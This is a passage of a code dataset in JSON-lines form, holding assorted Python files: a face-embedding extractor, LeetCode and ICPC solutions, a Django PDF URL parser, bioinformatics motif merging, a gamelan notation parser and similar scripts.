datetime.datetime(int(year), int(monthclear), 
int(day), int(hour), int(min))\n\n item = AviaItem()\n item['asn_datetime'] = str(datetimeclear)\n item['asn_type'] = asn_type\n item['asn_registration'] = asn_registration\n item['asn_fatalities'] = asn_fatalities[asn_fatalities.find(':') + 1:asn_fatalities.rfind('/')]\n item['asn_location'] = locationclear\n\n\n yield item\n","sub_path":"avia/spiders/asn.py","file_name":"asn.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25094519","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nfrom easydict import EasyDict as edict\nimport time\nimport sys\nimport numpy as np\nimport argparse\nimport struct\nimport cv2\nimport sklearn\nfrom sklearn.preprocessing import normalize\nimport mxnet as mx\nfrom mxnet import ndarray as nd\nimport ipdb\n\n\ndef read_img(image_path):\n img = cv2.imread(image_path)\n return img\n\n\ndef get_feature(imgs, nets):\n count = len(imgs)\n data = mx.nd.zeros(shape=(count*2, 3, imgs[0].shape[0], imgs[0].shape[1]))\n for idx, img in enumerate(imgs):\n img = img[:, :, ::-1] # to rgb\n img = np.transpose(img, (2, 0, 1))\n for flipid in [0, 1]:\n _img = np.copy(img)\n if flipid == 1:\n _img = _img[:, :, ::-1]\n _img = nd.array(_img)\n data[count*flipid+idx] = _img\n\n F = []\n for net in nets:\n db = mx.io.DataBatch(data=(data,))\n net.model.forward(db, is_train=False)\n x = net.model.get_outputs()[0].asnumpy()\n embedding = x[0:count, :] + x[count:, :]\n embedding = sklearn.preprocessing.normalize(embedding)\n #print('emb', embedding.shape)\n F.append(embedding)\n F = np.concatenate(F, axis=1)\n F = sklearn.preprocessing.normalize(F)\n #print('F', F.shape)\n return F\n\n\ndef save_featu(path, feature):\n # ipdb.set_trace()\n np.save(path, feature)\n\n\ndef get_and_write(buffer, nets):\n imgs = []\n for k in buffer:\n imgs.append(k[0])\n features = 
get_feature(imgs, nets)\n # print(np.linalg.norm(feature))\n assert features.shape[0] == len(buffer)\n for ik, k in enumerate(buffer):\n out_path = k[1]\n feature = features[ik].flatten()\n save_featu(out_path, feature)\n\n\ndef load_faceid_model(model_path, gpuid=0, image_size='3,112,112'):\n ctx = mx.gpu(gpuid)\n nets = []\n image_shape = [int(x) for x in image_size.split(',')]\n for model in model_path.split('|'):\n vec = model.split(',')\n assert len(vec) > 1\n prefix = vec[0]\n epoch = int(vec[1])\n print('loading', prefix, epoch)\n net = edict()\n net.ctx = ctx\n net.sym, net.arg_params, net.aux_params = mx.model.load_checkpoint(\n prefix, epoch)\n all_layers = net.sym.get_internals()\n net.sym = all_layers['fc1_output']\n net.model = mx.mod.Module(\n symbol=net.sym, context=net.ctx, label_names=None)\n net.model.bind(\n data_shapes=[('data', (1, 3, image_shape[1], image_shape[2]))])\n net.model.set_params(net.arg_params, net.aux_params)\n nets.append(net)\n return nets\n\n\ndef main(args):\n print(args)\n nets = load_faceid_model(args.model, gpuid=args.gpu,\n image_size=args.image_size)\n\n i = 0\n succ = 0\n buffer = []\n for dirname, _, files in os.walk(args.image_dir):\n for fi in files:\n if not fi.endswith('.jpg'):\n continue\n if i % 1000 == 0:\n print(\"writing fs\", i, succ)\n i += 1\n image_path = os.path.join(dirname, fi)\n img = read_img(image_path)\n if img is None:\n print('read error:', image_path)\n continue\n out_path = image_path.replace('.jpg', '.npy')\n item = (img, out_path)\n buffer.append(item)\n if len(buffer) == args.batch_size:\n get_and_write(buffer, nets)\n buffer = []\n succ += 1\n if len(buffer) > 0:\n get_and_write(buffer, nets)\n buffer = []\n print('fs stat', i, succ)\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, help='', default=32)\n parser.add_argument('--image_size', type=str, help='', default='3,112,112')\n parser.add_argument('--gpu', type=int, 
help='', default=0)\n parser.add_argument('--algo', type=str, help='', default='insightface')\n parser.add_argument('--image-dir', type=str, help='',\n default='./data/image_dir')\n parser.add_argument('--model', type=str, help='', default='')\n return parser.parse_args(argv)\n\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n","sub_path":"Evaluation/LineUp/gen_features.py","file_name":"gen_features.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"39229196","text":"def thirtyone():\n L = {}\n str = input()\n L[0] = str[0] # bottom-up base case\n for i in range(1, len(str)): # i represents the last pos of the sequence\n L[i] = '' # have to initialize\n for j in range(i): # j is where we take an LIS from a subproblem\n if ord(str[j]) <= ord(str[i]) and len(L[j]) + 1 > len(L[i]): # so it's incr and makes it longer\n L[i] = L[j]\n L[i] += str[i] # append the required final character\n print(L)\n max_key = max(L, key = lambda x: len(L[x]))\n print(L[max_key])\n\nthirtyone()\nexit()","sub_path":"0-Python Tasks/thirtyone_liang_d.py","file_name":"thirtyone_liang_d.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"30558662","text":"import numpy as np\nimport sys\n\n\ndef integration_alg(func, lower_bound, upper_bound, number_of_steps):\n \"\"\"\n\n :param func: function to use in integration, when given a radius, will return the value at that point\n :param lower_bound: lower bound of integration\n :param upper_bound: upper bound of integration\n :param number_of_steps: number of steps to do\n :return:\n \"\"\"\n\n # Current method if the midpoint rule, as the function is an improper integral from the lower bound being 0\n\n # Need to integrate from lower_bound to upper_bound in number_of_steps\n\n # lower bound is 0, if there is a radius of 0, then no 
satallites in it\n integration_value = 0\n step_size = (upper_bound - lower_bound) / number_of_steps # The number of steps to take\n for i in range(number_of_steps):\n if i != 0:\n # Current step can be just i*step_size but only if integral always starts at 0\n # since it might not, need a starting point otherwise:\n current_step = lower_bound + i * step_size\n prev_step = lower_bound + (i - 1) * step_size\n\n # Current midpoint is the current step + the prev step divided by 2\n # F(mk) where mk = (tk + tk-1)/2\n current_midpoint = (current_step + prev_step) / 2\n integration_value += func(current_midpoint)\n\n # Last bit is the multiplication by the step size to get the full value\n integration_value *= step_size\n\n return integration_value\n\n\ndef part_four_a():\n Omega_M = 0.3\n Omega_Lambda = 0.7\n\n def integrand(a):\n \"\"\"\n Integrand for the LGF\n :param a:\n :return:\n \"\"\"\n return (1 / a ** 3) / (Omega_M / a ** 3 + Omega_Lambda) ** 1.5\n\n def a_from_z(z):\n \"\"\"\n Gets a from z\n :param z:\n :return:\n \"\"\"\n return 1 / (z + 1)\n\n a0 = 0\n final_a = a_from_z(50) # z = 50, a = (z+1)\n sys.stdout = open('4a.txt', 'w')\n integral = integration_alg(integrand, a0, final_a, 20000)\n print(\"Integral value for the Integrand: {}\".format(integral))\n\n lgf = 5 * Omega_M / 2 * np.sqrt(Omega_M / final_a ** 3 + Omega_Lambda) * integral\n print(\"LGF at z = 50: {}\".format(lgf))\n","sub_path":"four_a.py","file_name":"four_a.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"42304879","text":"class Solution:\n ## TLE 40mins\n def minmaxGasDist(self, stations, k):\n \"\"\"\n :type stations: List[int]\n :type k: int\n :rtype: float\n \"\"\"\n from heapq import heappop, heappush\n from math import ceil\n if not stations: return None\n if len(stations) < 2: return 0\n # stations.sort()\n q = []\n for i in range(1, len(stations)):\n dist = stations[i] - 
stations[i-1]\n heappush(q, (-dist, 0 , dist))\n if k == 0: return -heappop(q)\n if len(q) == 1: return -heappop(q) / (k+1)\n while k > 0:\n max_dist, count, origin = heappop(q)\n max_dist = -max_dist\n second_dist = -q[0][0]\n # (k,max_dist, second_dist, q).p()\n need_k = max(ceil(origin / second_dist) - 1 - count, 1) \n # need_k.p()\n if k >= need_k:\n k -= need_k\n heappush(q, (-(origin / (count+need_k+1)) , count+need_k, origin))\n else:\n return origin / (k+count+1)\n return -q[0][0]\n\n\n def minmaxGasDist(self, stations, k):\n \"\"\"\n :type stations: List[int]\n :type k: int\n :rtype: float\n \"\"\"\n import math\n left, right = 1e-6, stations[-1] - stations[0]\n while left + 1e-6 < right:\n mid = (left + right) / 2\n # count is the number of gas station we need to make it possible\n count = sum(math.ceil((stations[i] - stations[i-1]) / mid) - 1 \n for i in range(1, len(stations)))\n # it means mid is too small to realize using only K more stations\n if count > k:\n left = mid\n # it means mid is possible and we can continue to find a bigger one\n else:\n right = mid\n return right\n\nif __name__ == '__main__':\n from minitest import *\n\n with test(Solution):\n Solution().minmaxGasDist([1, 2, 3, 4, 5, 6, 7, 8, 9, 10],9).must_equal(0.5)\n Solution().minmaxGasDist([1,2,3,5,7],1).must_equal(2)\n Solution().minmaxGasDist([1,2,3,5,7],2).must_equal(1)\n Solution().minmaxGasDist([10,19,25,27,56,63,70,87,96,97],3).must_equal(9.666666666666666)\n Solution().minmaxGasDist([13,15,20,31,46,49,51,52,67,87],7).must_equal(6.666666666666667)\n\n","sub_path":"python/leetcode/search/774_Minimize_Max_Distance_to_Gas_Station.py","file_name":"774_Minimize_Max_Distance_to_Gas_Station.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430052494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 20 17:07:08 2019\n\n@author: libin\n\"\"\"\n\nimport pandas as pd\nimport 
numpy as np\nimport seaborn as sns\nfrom functools import reduce\n\ncellType = ['RG', 'IPC', 'eN', 'iN']\nhomer_extra = [\"Eomes\", \"Tbr1\", \"PAX6\", \"Brn2\", \"Brn1\", \"Sox2\"]\njaspar_extra = [\"EOMES\", \"TBR1\", \"Pax6\", \"DLX6\", \"POU3F2\", \"POU3F3\", \"Sox2\"]\n\n# EOMES : JASPAR,HOMER\n# TBR1: JASPAR, HOMER\n# PAX6: JASPAR, HOMER\n# DLX5: NA\n# DLX6: JASPAR\n# POU3F2: JASPAR; BRN2: HOMER\n# POU3F3: JASPAR; BRN1: HOMER\n# SOX2: HOMER, JASPAR\n\n\njaspar_df_lst = []\njaspar_cleaned_df_lst = []\njaspar_merged_df_lst = []\njaspar_motif_list = []\nfor ct in cellType:\n# ct = 'eN'\n jaspar = pd.read_csv(r'C:\\Users\\libin\\UCSF\\motif_analysis\\Aug 20\\jaspar_known_results\\knownResults_{}.txt'.format(ct), sep=\"\\t\")\n jaspar[\"CellType\"] = ct\n jaspar[\"Motif\"] = jaspar['Motif Name'].str.extract(r'(.+?)[\\/]', expand=True)\n # jaspar[\"Motif\"] = jaspar['Motif Name'].str.upper()\n jaspar = jaspar[[\"Motif\", \"P-value\"]]\n jaspar = jaspar.rename(columns={\"P-value\" : \"{}\".format(ct)})\n jaspar_df_lst.append(jaspar)\n jaspar_cleaned = jaspar.iloc[:15,:]\n jaspar_cleaned_df_lst.append(jaspar_cleaned)\n jaspar_motif_list = jaspar_motif_list + jaspar_cleaned['Motif'].tolist()\njaspar_motif_list = jaspar_motif_list + jaspar_extra\njaspar_motif_list_dedup = list(dict.fromkeys(jaspar_motif_list))\njaspar_motif_list_dedup = pd.DataFrame(jaspar_motif_list_dedup, columns=[\"Motif\"])\nfor jaspar_df in jaspar_df_lst:\n jaspar_merged = pd.merge(jaspar_motif_list_dedup, jaspar_df, on=[\"Motif\"], how=\"inner\")\n jaspar_merged_df_lst.append(jaspar_merged)\njaspar_merged_all = reduce(lambda x, y : pd.merge(x ,y, on=[\"Motif\"]), jaspar_merged_df_lst)\njaspar_merged_all.to_csv(r'C:\\Users\\libin\\R_projects\\motif_analysis\\jaspar_merged', index=False, header=True, sep=\"\\t\")\n \n\nhomer_df_lst = []\nhomer_cleaned_df_lst = []\nhomer_merged_df_lst = []\nhomer_motif_list = []\nfor ct in cellType:\n homer = 
pd.read_csv(r'C:\\Users\\libin\\UCSF\\motif_analysis\\Aug_21\\homer_known_results\\knownResults_{}.txt'.format(ct), sep=\"\\t\")\n homer[\"CellType\"] = ct\n # remove 'SeqBias' motifs\n homer = homer[~homer[\"Motif Name\"].str.contains(\"Bias\")]\n homer[\"Motif\"] = homer['Motif Name'].str.extract(r'(.+?)(?:\\/|$)', expand=True)\n # homer[\"Motif\"] = homer['Motif Name'].str.upper()\n homer[\"Motif_cleaned\"] = homer['Motif'].str.extract(r'(.+?)(?:\\(|$)', expand=True)\n homer = homer[[\"Motif_cleaned\", \"P-value\"]]\n homer = homer.rename(columns={\"P-value\" : \"{}\".format(ct), \"Motif_cleaned\" : \"Motif\"})\n homer_df_lst.append(homer)\n homer_cleaned = homer.iloc[:15,:]\n homer_cleaned_df_lst.append(homer_cleaned)\n homer_motif_list = homer_motif_list + homer_cleaned['Motif'].tolist()\nhomer_motif_list = homer_motif_list + homer_extra\nhomer_motif_list_dedup = list(dict.fromkeys(homer_motif_list))\nhomer_motif_list_dedup = pd.DataFrame(homer_motif_list_dedup, columns=[\"Motif\"])\nfor homer_df in homer_df_lst:\n homer_merged = pd.merge(homer_motif_list_dedup, homer_df, on=[\"Motif\"], how=\"inner\")\n homer_merged_df_lst.append(homer_merged)\nhomer_merged_all = reduce(lambda x, y : pd.merge(x ,y, on=[\"Motif\"]), homer_merged_df_lst)\nhomer_merged_all.to_csv(r'C:\\Users\\libin\\R_projects\\motif_analysis\\homer_merged', index=False, header=True, sep=\"\\t\")\n","sub_path":"plot_motif.py","file_name":"plot_motif.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"146212795","text":"import sqlite3\n\ncon = sqlite3.connect(\"test_data.db\")\ncur = con.cursor()\n\n\n\n#テーブルの挿入\nsql2 = \"insert into fruits values('test_post20.py', 
'/Users/kanekoshohei/Documents/Git/Python/samurai/test_post20.py')\"\ncur.execute(sql2)\ncon.commit()\n\n\ncon.close()\n","sub_path":"tmp/create_column.py","file_name":"create_column.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"432848378","text":"from django.http import HttpResponse\nfrom django.views.generic import View\nfrom django.shortcuts import get_object_or_404\nimport json\nfrom io import BytesIO\nfrom pdfminer.pdfparser import PDFParser\nfrom pdfminer.pdfdocument import PDFDocument\nfrom pdfminer.pdfinterp import PDFResourceManager\nfrom pdfminer.pdfinterp import PDFPageInterpreter\nfrom pdfminer.pdfpage import PDFPage\nfrom pdfminer.layout import LAParams\nfrom pdfminer.converter import PDFPageAggregator\nfrom pdfminer.layout import LTTextLineHorizontal, LTTextBoxVertical\nfrom pdfminer.layout import LTContainer\n\nimport models\n\n\nclass AddDocument(View):\n def __parse_pdf(self, layout, document):\n if isinstance(layout, LTTextLineHorizontal):\n text = layout.get_text()\n text = text.strip()\n if text.startswith(u\"http://\") or text.startswith(u\"https://\"):\n self.__save_url(text, document)\n elif isinstance(layout, LTContainer):\n for item in layout:\n self.__parse_pdf(item, document)\n\n def post(self, request, pdf_name):\n stream = BytesIO(request.body)\n parser = PDFParser(stream)\n laparams = LAParams()\n document = PDFDocument(parser)\n rsrcmgr = PDFResourceManager()\n device = PDFPageAggregator(rsrcmgr, laparams=laparams)\n interpreter = PDFPageInterpreter(rsrcmgr, device)\n document_instance = models.PdfDocument(name=pdf_name, url_number=0)\n document_instance.save()\n for page in PDFPage.create_pages(document):\n interpreter.process_page(page)\n layout = device.get_result()\n layout.analyze(laparams)\n self.__parse_pdf(layout, document_instance)\n document_instance.save()\n return HttpResponse(200)\n\n def __save_url(self, text, 
document):\n document.url_number += 1\n url_object, created = models.Address.objects.get_or_create(path=text)\n if created:\n url_object.save()\n url_object.documents.add(document)\n url_object.save()\n\n\nclass GetDocumentsList(View):\n def get(self, request):\n documents = models.PdfDocument.objects.all()\n data = []\n for doc in documents:\n urls = doc.address_set.all()\n obj = {'id': doc.id, 'name': doc.name, 'url_count': len(urls)}\n data.append(obj)\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n\nclass GetDocURLs(View):\n def get(self, request, doc_id):\n document = get_object_or_404(models.PdfDocument, pk=doc_id)\n urls = document.address_set.all()\n items = [item.path for item in urls]\n return HttpResponse(json.dumps(items), content_type='application/json')\n\n\nclass ListUrls(View):\n def get(self, request):\n urls = models.Address.objects.all()\n data = []\n for item in urls:\n docs = item.documents.all()\n itemData = {'path': item.path, 'doc_count': len(docs)}\n data.append(itemData)\n return HttpResponse(json.dumps(data), content_type='application/json')","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"159973147","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 9 12:15:54 2018\n\n@author: jduran2\n\"\"\"\n\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport openpyxl as xl\nimport scipy\nfrom scipy.interpolate import interpn\nimport os\n\n \ndef putIntoArray(sheet, minRange, maxRange):\n cells = sheet[minRange:maxRange]\n cells = np.array(cells)\n cells = np.reshape(cells, cells.size)\n values = [cell.value for cell in cells]\n values = np.transpose(values)\n return values \n\nos.chdir(r'C:\\Users\\jduran2\\Dropbox (ORNL)\\UTK\\SCGSR\\LAMS Data\\Probe Maps') # pick the working 
directory\n\n\nfile_name = \"AD32_Map.xlsx\"\ndata_min = 2\ndata_max = 3435\n\nwb = xl.load_workbook(file_name, data_only=True) #change this to a user input string for which file to analyze\nworksheets = wb.get_sheet_names()\nsheet = wb.get_sheet_by_name(worksheets[1])\ndata = putIntoArray(sheet, \"C\"+ str(data_min), \"C\" + str(data_max))\nrmm = putIntoArray(sheet, \"A\"+ str(data_min), \"A\" + str(data_max))\nPmm = putIntoArray(sheet, \"B\"+ str(data_min), \"B\" + str(data_max))\n\n\nz=data\nx=rmm\ny=Pmm\nz_array=[]\n\n#z2 = scipy.interpolate.interp2d(x, y, z, kind='linear')\n\n#Use this for 2D contour plots\n\"\"\"\nfrom scipy.interpolate import griddata\n\nX,Y = np.meshgrid(x,y)\nZ = griddata((x,y),z,(x[None,:],y[:,None]), method='nearest', rescale='false')\n#Z = interpn((x,y),z,(x[None,:],y[:,None]))\nCP = plt.contourf(X,Y,Z,100,cmap=cm.jet)\nplt.scatter(x, y, marker='o', s=5, zorder=10)\n\nfsize=19\nplt.title('CP Contour Plot', size=fsize)\nplt.xlabel('r [mm]', size=fsize)\nplt.ylabel('z [mm]', size=fsize)\ncbar = plt.colorbar(CP)\ncbar.ax.set_ylabel('Total W counts via LAMS', size=fsize)\nplt.rcParams.update({'font.size': fsize})\n\"\"\"\n#Use this for 2Dcolormaps of Raw Data\n\nimport pandas as pd\nimport seaborn as sns\n\ndf = pd.DataFrame.from_dict(np.array([x,y,z]).T)\ndf.columns = ['Poloidal Location [mm]','Axial Location [mm]','Z_value']\ndf['Z_value'] = pd.to_numeric(df['Z_value'])\npivotted= df.pivot('Axial Location [mm]','Poloidal Location [mm]','Z_value')\nax=sns.heatmap(pivotted,cmap=cm.jet,cbar_kws={'label': 'Total W Intensity'}) #vmax=###### for cbar limit 'Total W Intensity'\nax.invert_yaxis()\nfor ind, label in enumerate(ax.get_xticklabels()):\n if ind % 20 == 0: # every 10th label is kept\n label.set_visible(True)\n else:\n label.set_visible(False)\n#ax.figure.savefig(\"output.png\")\n\n#Use this for 3Dcolormaps\n\"\"\"\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_trisurf(x, y, z, cmap=cm.jet, 
linewidth=0.2)\n#ax.zaxis.set_scale('log')\n\nfor angle in range(0, 360):\n ax.view_init(90, angle)\n plt.draw()\n plt.pause(.001)\n\nplt.show()\n\"\"\"\n\n","sub_path":"misc/lams/cpMap_axial.py","file_name":"cpMap_axial.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525968661","text":"# ---------------------------------------------------------------\n# Problem H | ICPC North America Qualifiers 2015 | Eshan Uniyal\n# December 2018, Python 3\n# http://cs.baylor.edu/~hamerly/icpc/qualifier_2015/\n# problemset-naq-2015.pdf?fbclid=IwAR1Y75gFxxxJr-wKxg8y-QAhr_57GfEBwRokbFclSsCcR28CoZlTn5GmPyE\n# ---------------------------------------------------------------\n\nimport timer\n\n# Sample Input\n# 3\n# iloveyouJack\n# iloveyoutooJill\n# TheContestisOver\n\ndef convert(message):\n \"\"\"function to create matrix from message\"\"\"\n # takes 0.00017 seconds for three lines; even with the significantly large upper-limit for message length (10,000),\n # since maximum number of lines is 100, should run well below 2 seconds\n\n # determining size (length or breadth) of the matrix\n size = int(len(message) ** 0.5)\n\n if size ** 2 < len(message):\n size += 1\n\n string = message + '*' * (size ** 2 - len(message))\n\n # creating matrix\n matrix = []\n\n for i in range(0, size):\n matrix.append([x for x in string[i * size: (i + 1) * size]])\n\n # creating inverse of matrix\n\n inverted_matrix = []\n for i in range(0, size):\n inverted_matrix.append([row[i] for row in matrix][:: -1])\n\n return inverted_matrix\n\n\ndef main():\n \"\"\"main function\"\"\"\n\n # taking input\n num_lines = int(input()) # to determine number of lines\n lines = [] # to store lines\n\n for i in range(0, num_lines):\n lines.append(input())\n\n timer.start()\n\n # computing and printing output\n for line in lines:\n\n result_matrix = convert(line)\n\n # removing asterisks\n for row in result_matrix:\n for 
character in row:\n if character == '*':\n row.remove(character)\n\n # joining characters\n result = ''\n for row in result_matrix:\n result += ''.join(row)\n\n print(result)\n\n\nmain()\ntimer.end()\n\n# Expected Sample Output:\n# Jeiaylcookuv\n# iteiloylloooJuv\n# OsoTvtnheiterseC","sub_path":"ICPC_North_America_Qualifiers_2015/problem_H.py","file_name":"problem_H.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"619742322","text":"# ybc module\n\nimport string\nimport os\nimport re\nimport sys\n\npitchCodesIn = ['1','2','3','4','5','6','7','q','w','e','r','t','y','u','!','@','#','\\$','%','\\^','&',]\npitchCodesOut = [' b1 ',' b2 ',' b3 ',' b4 ',' b5 ',' b6 ',' b7 ',' a1 ',' a2 ',' a3 ',' a4 ',' a5 ',' a6 ',' 7a ',' c1 ',' c2 ',' c3 ',' c4 ',' c5 ',' c6 ',' c7 ']\n\nybcCorpus = list() # list of ybcBalungan instances\n\nclass ybcBalungan:\n def __init__(self, filename):\n self.filename = filename\n self.shortname = re.sub('/.*/(.*).txt','\\g<1>',filename)\n self.gatras = list() # list of ybcGatra instances\n self.scale = ''\n self.mode = ''\n\nclass ybcGatra:\n def __init__(self):\n self.notes = list() # list of ybcNote instances\n \nclass ybcNote: # class for balungan notes\n def __init__(self, pitch, beat):\n \n # pitch and beat must be identified\n self.pitch = pitch\n self.beat = beat\n \n # set defaults for other variables\n self.gong = False\n self.nong = False\n self.pul = False\n self.beatOffset = 0\n \n def __str__(self):\n return 'pitch = {0}, beat = {1}, gong = {2}, nong = {3}, pul = {4}'.format(self.pitch, self.beat, self.gong, self.nong, self.pul)\n\nclass ybcCorpus:\n def __init__(self, ybcPathname):\n\n self.balungans = list()\n \n corpusDirs = [\n 'slendro/manyura/ladrang/',\n 'slendro/nem/ladrang/',\n 'slendro/sanga/ladrang/'\n ]\n\n corpusFiles = []\n for theDir in corpusDirs:\n thePath = ybcPathname + '/corpus/' + theDir + 'txt/'\n 
corpusFiles.extend( [ thePath + f for f in os.listdir(thePath) ] )\n \n\n for theFile in corpusFiles:\n\n if theFile[-16:] == 'Sala Minulya.txt': continue # this file has a problem\n\n thisBalungan = ybcBalungan(theFile)\n f = open(theFile, 'r')\n for l in f:\n l = l.strip()\n \n if len(l) == 0: continue\n tag = re.search('<(.*)>', l)\n # print l\n if tag: # m is True if the current line consists of a \n metadata = string.rsplit(tag.groups(1)[0],' ') # TK: use this metadata\n if metadata[0] == 'P':\n thisBalungan.mode = metadata[1]\n if metadata[0] == 'L':\n thisBalungan.scale = metadata[1]\n else: # we've got plain data\n\n # do some basic cleanup\n l = re.sub('\\\\t\\\\t','\\\\t',l) # get rid of double tabs, assuming they're meaningless\n l = re.sub('\\\\t\\\\t','\\\\t',l) # do it again in case there were any triple tabs\n l = re.sub('\\\\[','',l) # get rid of brackets until we know what to do with them\n l = re.sub('\\\\]','',l)\n l = re.sub('o ','',l) # get rid of 'o' which represents a segno-type star in Kepatihan\n l = re.sub('o','',l) # get rid of 'o' which represents a segno-type star in Kepatihan\n l = re.sub('\\\\\\\\','',l) # get rid of '\\' which represents a segno-type star in Kepatihan\n\n\n gatras = l.split('\\t') # split the current line on tab characters (which separate gatras)\n \n for g in gatras:\n\n # beats within gatra are separated by spaces -- split on spaces and clean up\n gs = string.rstrip(g).split(' ')\n i = 0\n while i < len(gs): \n \n # three successive spaces in the input file is interpreted as a single blank beat\n # split will have parsed three successive spaces into two successive null strings\n if i+1 < len(gs) and gs[i] == '' and gs[i+1] == '': \n gs.pop(i+1) # delete the second null string\n \n else:\n i += 1\n\n # die if there are more than four beats in the gatra\n if len(gs) > 4: \n sys.exit('gatra with more than four beats in ' + theFile + ': ' + str(gs) + '>'+l)\n \n # if we have fewer than four beats, assume they are at 
the end of the gatra\n if len(gs) < 4:\n for j in range(4-len(gs)):\n gs[:0] = [' '] # insert a space before the first item in gs\n \n # now we're ready to create a ybcGatra instance for this gatra\n thisGatra = ybcGatra()\n \n # parse pitch characters, adding spaces before and after\n old = str(gs)\n for beat in range(len(gs)):\n\n\n noteCount = 0\n # we use two matching lists (pitchCodesIn and -Out) so we can go through in\n # the right order; digits need to get translated first because we use them\n # in the output as well as the input\n for j in range(len(pitchCodesIn)):\n (newtext, subs) = re.subn(pitchCodesIn[j], pitchCodesOut[j], gs[beat])\n gs[beat] = newtext\n noteCount += subs\n \n # print noteCount, gs[i], gs, old\n # get rid of any extra spaces we just made\n gs[beat] = re.sub('^ ','',gs[beat]) # eliminate leading spaces\n gs[beat] = re.sub(' $','',gs[beat]) # eliminate trailing spaces\n gs[beat] = re.sub(' ',' ',gs[beat]) # consolidate double spaces\n \n beatContents = string.rsplit(gs[beat], ' ')\n \n # trivial case: a rest only\n if noteCount == 0:\n theNote = ybcNote('',beat)\n \n # simplest non-trivial case: one note in the beat\n elif noteCount == 1:\n if len(beatContents) == 1:\n thisNote = ybcNote(beatContents[0], beat)\n elif len(beatContents) == 2:\n # the first item in beatContents is a gong marker\n thisNote = ybcNote(beatContents[1], beat)\n if re.search('n',beatContents[0]): \n thisNote.nong = True\n if re.search('p',beatContents[0]): \n thisNote.pul = True\n if re.search('g',beatContents[0]): \n thisNote.gong = True\n else:\n sys.exit('syntax error in '+filename+': '+l)\n thisGatra.notes.append(thisNote)\n \n # with two notes in the beat we assume they're equal\n elif noteCount == 2:\n thisNote = ybcNote('',beat)\n while beatContents != []:\n if beatContents[0][0] not in string.digits:\n if re.search('n',beatContents[0]): \n thisNote.nong = True\n if re.search('p',beatContents[0]): \n thisNote.pul = True\n if 
re.search('g',beatContents[0]): \n thisNote.gong = True\n beatContents.pop(0)\n continue\n else:\n thisNote.pitch = beatContents[0]\n thisGatra.notes.append(thisNote)\n if len(beatContents) > 1: \n thisNote = ybcNote('',beat + 0.5)\n beatContents.pop(0)\n continue\n \n # with more than two notes we only look at the first note \n else: \n sys.stderr.write('WARNING: Ignoring all but first note in a beat with more than 2 subdivisions.\\n')\n sys.stderr.write('File: '+thisBalungan.filename+'\\n')\n thisNote = ybcNote('',beat)\n if beatContents[0][0] not in string.digits:\n if re.search('n',beatContents[0]): \n thisNote.nong = True\n if re.search('p',beatContents[0]): \n thisNote.pul = True\n if re.search('g',beatContents[0]): \n thisNote.gong = True\n else:\n thisNote.pitch = beatContents[0]\n thisGatra.notes.append(thisNote)\n \n\n # now add theGatra to theBalungan\n thisBalungan.gatras.append(thisGatra)\n \n # add thisBalungan to the corpus\n self.balungans.append(thisBalungan)","sub_path":"code/ybc.py","file_name":"ybc.py","file_ext":"py","file_size_in_byte":10118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"22993019","text":"import sqlite3 as sq# sqlite\nimport pymssql as ms # mssql\nimport pymysql as my # mysql\n\n# 处理pyinstaller 和 pymssql 闪退问题\n\nimport uuid\nimport _mssql\nimport decimal\nimport pypyodbc\ndecimal.__version__\nuuid.ctypes.__version__\n_mssql.__version__\n\nclass db:\n\tdef __init__(self,type='',file='',host='',username='',password='',database=''):\n\t\tdbType = ['sqlite','mssql','mysql']\n\t\t# 判断系统类型\n\t\tif not type in dbType:\n\t\t\traise RuntimeError('数据库类型错误,类型必须为:'+','.join(dbType))\n\t\t\treturn \n\t\tself.type = type\n\t\tif type == 'sqlite':\n\t\t\tself.conn = sq.connect(file)\n\t\telif type == 'mssql':\n\t\t\tself.conn = ms.connect(host=host,user=username,password=password,database=database,charset='utf8')\n\t\telif type == 'mysql':\n\t\t\tself.conn = 
